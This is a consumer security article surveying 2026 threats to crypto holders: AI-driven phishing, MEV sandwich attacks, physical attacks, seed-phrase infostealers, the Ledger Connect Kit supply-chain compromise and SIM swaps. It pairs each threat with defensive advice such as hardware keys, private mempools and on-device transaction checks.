The 2026 Crypto Threat Report: What Has Changed

The threat environment for crypto holders has shifted significantly since 2023. The attack categories are not new - phishing, social engineering, malware, physical theft - but the scale and sophistication have changed. Three specific trends deserve attention in 2026: AI-driven fraud at scale, Blockchain Extractable Value attacks on DeFi, and a documented rise in physical attacks targeting known holders.

AI-Driven Fraud: Scale Changed Everything

The FBI's 2025 Internet Crime Report noted a 1,400% increase in AI-assisted fraud complaints compared to 2022 baseline figures. “AI-assisted” in this context means attackers are using language models to generate phishing emails without the grammatical errors that made them detectable, voice cloning to impersonate exchange support staff over phone calls, and deepfake video to impersonate executives in targeted attacks on corporate treasury wallets.

The quality filter that previously caught most phishing - broken English, generic salutations, suspicious formatting - no longer applies. AI-generated phishing passes grammar checks and can be personalized at scale using data scraped from social media and LinkedIn. An attacker who knows your exchange, your approximate holdings, and your name can generate a convincing “unusual sign-in detected” email that matches the exact formatting of your actual exchange's communications.

Blockchain Extractable Value: $540M in 2025

Blockchain Extractable Value (BEV, sometimes called MEV - Miner/Maximal Extractable Value) refers to profit extracted by reordering, inserting, or censoring transactions within a block. This is not hacking in the traditional sense - it operates within the rules of the protocol. But the economic impact on ordinary DeFi users is real.

Flashbots Research and other monitoring organizations tracked approximately $540M in BEV extraction on Ethereum in 2025, down from the 2021 peak but sustained at high levels. The most common forms are sandwich attacks (where a bot detects your pending large swap, front-runs it to move the price, and back-runs it to profit from the slippage it caused), and liquidation MEV (where bots compete to be first to liquidate undercollateralized positions in lending protocols).

For ordinary users, the practical defense is slippage tolerance settings. Setting your maximum slippage above 0.5-1% on large swaps increases your sandwich attack exposure. Private mempool services like MEV Blocker (mevblocker.io) and Flashbots Protect (protect.flashbots.net) route your transactions to validators who have agreed not to extract MEV from them.

Physical Attacks: Up 75% Since 2023

The Jameson Lopp “Known Physical Bitcoin Attacks” database, which has tracked documented physical attacks on crypto holders since 2014, recorded a 75% increase in incidents between 2023 and 2025. The attacks range from home invasions where attackers force victims to transfer funds at gunpoint to targeted kidnappings of known high-net-worth individuals identified through public wallet data or social media.

The reason is straightforward: as crypto prices increased and on-chain data became easier to analyze, the financial profile of many holders became public knowledge. An attacker who knows your name, your approximate holdings (from your public wallet), and your address has everything needed to plan a physical attack. This is not a theoretical threat - documented incidents have occurred across the US, UK, Germany, Brazil, and Southeast Asia.

Malware Targeting Crypto Users

Crypto-targeting malware has become more specialized. Clipboard hijackers that replace copied wallet addresses have existed for years, but 2024-2025 saw the rise of wallet-specific infostealer malware that specifically targets MetaMask vault files, Ledger Live data, and seed phrase files stored on disk.

The Lumma Stealer and Atomic Stealer families, both active in 2025, specifically search for strings matching BIP39 wordlist patterns in text files, screenshots, and clipboard history. If you photographed your seed phrase and the photo is in iCloud Photos, or you typed it into a notes app, these stealers will find it.

Supply Chain Attacks on Wallet Software

The December 2023 Ledger Connect Kit compromise remains the clearest recent example of a supply chain attack targeting crypto users. An attacker gained access to a former Ledger employee's npm account and pushed a malicious version of the Ledger Connect Kit library, which is loaded by many DeFi frontends. The malicious code ran a drainer against connected wallets for several hours before detection.

The Ledger hardware itself was not compromised - users who signed transactions through the compromised library on software wallets were affected. Hardware wallet users who read the transaction details on their device screen before confirming would have seen a suspicious destination address. This is why verifying transaction details on the hardware wallet screen - not your computer screen - matters.

SIM Swap Attacks on Exchange Accounts

SIM swap fraud - convincing a mobile carrier to transfer a victim's phone number to an attacker-controlled SIM card - remains the dominant method for bypassing SMS two-factor authentication on exchange accounts. The FTC received over 15,000 SIM swap complaints in 2023 and the number has increased annually.

Exchanges that only offer SMS 2FA are still common. The fix is to use a hardware security key (YubiKey) or authenticator app (Google Authenticator, Authy) instead of SMS wherever available. Exchanges that support FIDO2 hardware keys include Coinbase, Kraken, and Gemini. For exchanges where you must use SMS 2FA, adding a carrier PIN that must be verified before any SIM change request is the minimum mitigation.